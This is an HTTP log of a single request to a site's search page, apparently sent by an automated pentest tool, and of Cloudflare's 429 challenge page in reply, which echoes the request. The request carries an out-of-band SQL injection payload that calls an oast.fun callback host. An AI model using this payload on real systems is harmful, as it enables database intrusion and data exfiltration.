REQUEST:
GET https://my.myfirst.tech/search?search=%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%280%29%29%29a%20UNION%20SELECT%20LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z4j1bct9dfl36a.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9989
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84738a873a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=JZfrr647wsUq%2Be7RIcTLA7vRFPAhFdK0Rnt8ATnqUTxMsDTkminPmfR4tqiNx16EAshIBvK7L5Q0t7I1A7rEJhtRLVvhreLn00XWWh%2FEgTYGDv%2FpZ%2Fnhf1lVI0kC8wK64A%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84738a873a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'toxYBziQE6ABkBKkWi6DVVxrEsDKnhpEaUeqrTx7SFs-1784281153-1.2.1.1-LQXLwjsv44gIFcsIabTjlgIDLWCGHT3eIbvjdSMf6u09GTB.OVDMB7jgj1h75zwj',cITimeS: '1784281153',cRay: 'a1c84738a873a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?search=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z4j1bct9dfl36a.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_tk=dV_BP9jhXsxRE7fIto9AIof1R0NICLitJVVloLOfKjk-1784281153-1.0.1.1-02G8dpUKX3dZpyuJ1M2pQsjJqIFfS2k2Y0QSUHUmjnE",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?search=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z4j1bct9dfl36a.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_f_tk=dV_BP9jhXsxRE7fIto9AIof1R0NICLitJVVloLOfKjk-1784281153-1.0.1.1-02G8dpUKX3dZpyuJ1M2pQsjJqIFfS2k2Y0QSUHUmjnE",md: 'pjf4t4M.MGDH7_ZXxwTqoFLfu11JCWwT1kAhWMbZ27s-1784281153-1.2.1.1-6KqIxhMrBbGJpZyFVOpK0nTzcCrEe00IG1HQrwZa.7hOs7kyv974FHYpSTAMyAUZUqcO74XD8MbMxtqvoYEDMDhaladJmX.YConzgkNhFlG6nCLaYIsWBguoPCcrM5G6iqKaFSwnG0Dqhc.jv4s6hyVQuCI.UeOrScEdUU.k5Wr4SPwcJZyP.yBWG8VLo9hcKEc9tnIIpQKb4_Yc5Shj15t_sd9YFmEsQMmg0CikH.4wyeYgfA07eMj.p9DOQ2V2KLgNfKYWQqF.0LlIGdp.ZX1hxpB56yDYfWQnlow1xeTJJLOumAsDmFmNr5nAd7Bpajx3nQ1jrQLfU6RtsDWJ4GgM1fNTG9GKcadkQRtYSjn9j.iaRzJQETpjXPShaMDmE36qq9YmX.mtdaFPUgz0UPsj6hieIzMTm0kjO3g1WdOZdrBZZlkD22MQPXLJTChtP1iUgg84aqd2hFC1qVMYZillTwwhiqhun8eLVwA9vIWtizSt.MejhALwJ_aHEYARMRkuOOo8BPDeIv9BHa4.u2ytOGPbkQLK_GIUt4EHNCj_3yVrhkMotPsu0APzVeop_AIOU6AtaBGF4Lzko6Oqkuw1GRE1ZtxbewNlPMPENUDW.nHMhZcVKficZ7hPT261i5UE39aHZcd4LEcDnuVBTTywHdNXr82tI8aDu8PCKP9eQY6m5XDU.ayRoUOBFoVkMzFNckjKi697vMBy6insiWp6oNQlHFXybA0xMlhNmvauqe4cqvGf4.N.H1hPaxkyLmihL1gWZAugwWLfLS3ljLLDyM8nM0bjk4kIj0TURobmdQKCUPphQUECxSHxxgLqHa.urYIIxwStiQurgIBfZSrUcVfT5dS39VCCH3riBJ2qhGnrYGyUfkE5qbnILptRN12HfqpRPYX418wbEXlJu8wuNEZIdmh0ZkcFSOBQ4dQic6Og_w2_DxyTeVC5RlmPwFALcEnZ_SbrPWKUF1fpMWS22nSTLpF4qJMDTQC9U5HG8k3Dvs6w0isaYJ4fT8vpzhJVqHW.GuRqA._KCFSL7AxjyDGfpwNetSdVBILAOsC93Z9V6JP7b.ecuxgRdRm9vNxKmA49yz._w8smgJOjGk_xY77YKRhg4NQbUD8G7dXmR8f2P9LK9xb6PzKMQubfCjWrUDp1_7omo77cxU8aIWQUj7IgJ9EH.H8maC9fwXHzFR269KlDWrBB0LuphxUkNVmBBu.79e2lBcFGWJg9dhj1MMSS9mTpUz2DKOS5Z1oOjWJ7Tg..bIzxhc2p32MGO6DE3UGLkXUUL0EBk0xBTK7RwDMRPHusAIeuLRFBpzv8acjXjX7W0SrsI3IpfjMC4ROSU.46mXkNARE9FCbXmw',mdrd: 'nzAGyNAnRkB2yL8T8gr3XVaEJmf4aj8QNp5Cr045Ipc-1784281153-1.2.1.1-kuMtWGcmXY3dRElESa9QwZNZ_cLpldw44ejtD2MXxONwy_.fXb5R_Mtte_RLn046WNLx8XD2dTrrTtoOCfMbiLBxkB_Td9aBWn3mqOtbejK8nnP6_XU98MtsobptsI4mTB7VY2EkMzi75Oxkip0895pkDiPYZYuVs1IBAFJLukPrM_jsr7h7s8g3KWIxsyxSG6_N1qSINUzY.RkmKDyv2lxtRQKhCKGLhhc5RtEyRNZrDehwnWi8Byh1UGZzjiUf',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84738a873a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?search=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z4j1bct9dfl36a.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_rt_tk=dV_BP9jhXsxRE7fIto9AIof1R0NICLitJVVloLOfKjk-1784281153-1.0.1.1-02G8dpUKX3dZpyuJ1M2pQsjJqIFfS2k2Y0QSUHUmjnE"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
